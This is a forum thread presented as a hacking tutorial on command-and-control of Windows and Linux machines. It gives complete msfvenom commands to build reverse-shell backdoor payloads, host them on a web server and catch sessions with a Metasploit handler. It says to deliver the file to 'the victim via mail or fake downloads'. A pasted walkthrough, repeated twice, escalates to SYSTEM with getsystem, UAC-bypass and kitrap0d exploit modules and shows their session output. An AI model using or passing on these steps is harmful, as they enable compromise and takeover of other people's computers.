Linux C&C Windows and Linux
Page 1 of 1
Linux C&C Windows and Linux
Linux C&C Tuts
Step 1: Creating the Payload
To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows.
Start apache2 server to host the file
Hacking Linux From Kali
Info:
How to Exploit Windows using Kali Linux
Step 1: Creating the Payload
To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows.
Open terminal and Type
- Code:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=your-ip LPORT=5555 -f exe -o /var/www/html/win.exe
Start apache2 server to host the file
- Code:
sudo service apache2 start
Step 2: Starting the Metasploit Framework Console
For controlling the payload we need to start the Metasploit Framework Concole which is prebuilt in Kali Linux.
The Metasploit Framework Console has many payloads and many exploit method.
To start the Metasploit Framework Console. In the terminal type
- Code:
msfconsole
Step 3: Choosing the Exploit Method
As I have said the Metasploit Framework Console has many exploitation method.
In this we will use the multi handler.
Type
- Code:
use exploit/multi/handler
Step 4: Setting the Payload
In above step we set our exploitation method. In this step we need to specify the payload that we have created.
Type
- Code:
set payload windows/meterpreter/reverse_tcp
Step 5: Providing Ip for Backdooring
In this step we need to provide the ip address of our machine so that the payload will connect to our system.
To find the ip address, open terminal and type
, and copy your ip address.
- Code:
ifconfig
, and copy your ip address.
Then we have to set it in the msfconsole, so type
- Code:
set LHOST (your ip address)
Step 6: Sending the File and Exploiting
After we have given all the information. We need to send the .exe file we created before to the victim via mail or fake downloads. make sure that the victim install the files.
After doing it, in the msfconsole command, type
- Code:
exploit
Hacking Linux From Kali
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
STEPS:
1. Open terminal (CTRL + ALT + T)
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfvenom python/meterpreter/reverse_tcp LHOST=LPORT= -o /var/www/html/payloadname.py
As described above that attacker IP address is 192.168.43.185, below is our screenshot when executed the command
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
Info:
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.use exploit/multi/handler –> we will use Metasploit handler
set payload python/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
Info:
set lhost 192.168.43.185 –> attacker IP address
set lport 4444 –> port to listen the reverse connection
exploit –> start to listen incoming connection
Last edited by jamied_uk on 4th February 2022, 13:15; edited 5 times in total
Re: Linux C&C Windows and Linux
Tor Enable Remote Desktop Server On Kali
To auto start
- Code:
sudo apt install -y xrdp && sudo service xrdp start && sudo service xrdp-sesman start
To auto start
- Code:
sudo update-rc.d xrdp enable
Re: Linux C&C Windows and Linux
More Reading
offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts
offensive-security.com/metasploit-unleashed/custom-scripting
offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts
offensive-security.com/metasploit-unleashed/custom-scripting
Re: Linux C&C Windows and Linux
More On Privalige Escalation
Privilege Escalation
Frequently, especially with client side exploits, you will find that your session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc. Fortunately, Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate privileges.
Using the infamous ‘Aurora’ exploit, we see that our Meterpreter session is only running as a regular user account.
msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600
msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: XEN-XP-SP2-BARE\victim
meterpreter >
To make use of the getsystem command, if its not already loaded we will need to first load the ‘priv’ extension.
meterpreter > use priv
Loading extension priv...success.
meterpreter >
Running getsystem with the -h switch will display the options available to us.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
meterpreter >
We will let Metasploit try to do the heavy lifting for us by running getsystem without any options. The script will attempt every method available to it, stopping when it succeeds. Within the blink of an eye, our session is now running with SYSTEM privileges.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
There are situations where getsystem fails. For example:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >
When this happens, we are able to background the session, and manually try some additional exploits that Metasploit has to offer. Note: The available exploits will change over time.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms10_002_aurora) > use exploit/windows/local/
...snip...
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
...snip...
use exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms11_080_afdjoinleaf
use exploit/windows/local/ms13_005_hwnd_broadcast
use exploit/windows/local/ms13_081_track_popup_menu
...snip...
msf exploit(ms10_002_aurora) >
Let’s try and use the famous kitrap0d exploit on our target. Our example box is a 32-bit machine and is listed as one of the vulnerable targets…
msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161
msf exploit(ms10_015_kitrap0d) > set LPORT 4443
msf exploit(ms10_015_kitrap0d) > show options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.1.161 yes The listen address
LPORT 4443 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf exploit(ms10_015_kitrap0d) > exploit
[*] Started reverse handler on 192.168.1.161:4443
[*] Launching notepad to host the exploit...
[+] Process 4048 launched.
[*] Reflectively injecting the exploit DLL into 4048...
[*] Injecting exploit into 4048 ...
[*] Exploit injected. Injecting payload into 4048...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (769024 bytes) to 192.168.1.71
[*] Meterpreter session 2 opened (192.168.1.161:4443 -> 192.168.1.71:49204) at 2014-03-11 11:14:00 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
offensive-security.com/metasploit-unleashed/privilege-escalation/
Privilege Escalation
Frequently, especially with client side exploits, you will find that your session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc. Fortunately, Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate privileges.
Using the infamous ‘Aurora’ exploit, we see that our Meterpreter session is only running as a regular user account.
msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600
msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: XEN-XP-SP2-BARE\victim
meterpreter >
GetSystem
To make use of the getsystem command, if its not already loaded we will need to first load the ‘priv’ extension.
meterpreter > use priv
Loading extension priv...success.
meterpreter >
Running getsystem with the -h switch will display the options available to us.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
meterpreter >
We will let Metasploit try to do the heavy lifting for us by running getsystem without any options. The script will attempt every method available to it, stopping when it succeeds. Within the blink of an eye, our session is now running with SYSTEM privileges.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Local Exploits
There are situations where getsystem fails. For example:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >
When this happens, we are able to background the session, and manually try some additional exploits that Metasploit has to offer. Note: The available exploits will change over time.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms10_002_aurora) > use exploit/windows/local/
...snip...
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
...snip...
use exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms11_080_afdjoinleaf
use exploit/windows/local/ms13_005_hwnd_broadcast
use exploit/windows/local/ms13_081_track_popup_menu
...snip...
msf exploit(ms10_002_aurora) >
Let’s try and use the famous kitrap0d exploit on our target. Our example box is a 32-bit machine and is listed as one of the vulnerable targets…
msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161
msf exploit(ms10_015_kitrap0d) > set LPORT 4443
msf exploit(ms10_015_kitrap0d) > show options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.1.161 yes The listen address
LPORT 4443 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf exploit(ms10_015_kitrap0d) > exploit
[*] Started reverse handler on 192.168.1.161:4443
[*] Launching notepad to host the exploit...
[+] Process 4048 launched.
[*] Reflectively injecting the exploit DLL into 4048...
[*] Injecting exploit into 4048 ...
[*] Exploit injected. Injecting payload into 4048...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (769024 bytes) to 192.168.1.71
[*] Meterpreter session 2 opened (192.168.1.161:4443 -> 192.168.1.71:49204) at 2014-03-11 11:14:00 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
offensive-security.com/metasploit-unleashed/privilege-escalation/
Similar topics
» Kali Linux in the Windows App Store || Kali Linux 2018.2 Launch
» Secure Netcat For Windows & Linux
» Linux Subsystem On Windows 10
» Wireshark For Windows & Linux
» Windows MMC Shares Plus Linux Web Server
» Secure Netcat For Windows & Linux
» Linux Subsystem On Windows 10
» Wireshark For Windows & Linux
» Windows MMC Shares Plus Linux Web Server
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|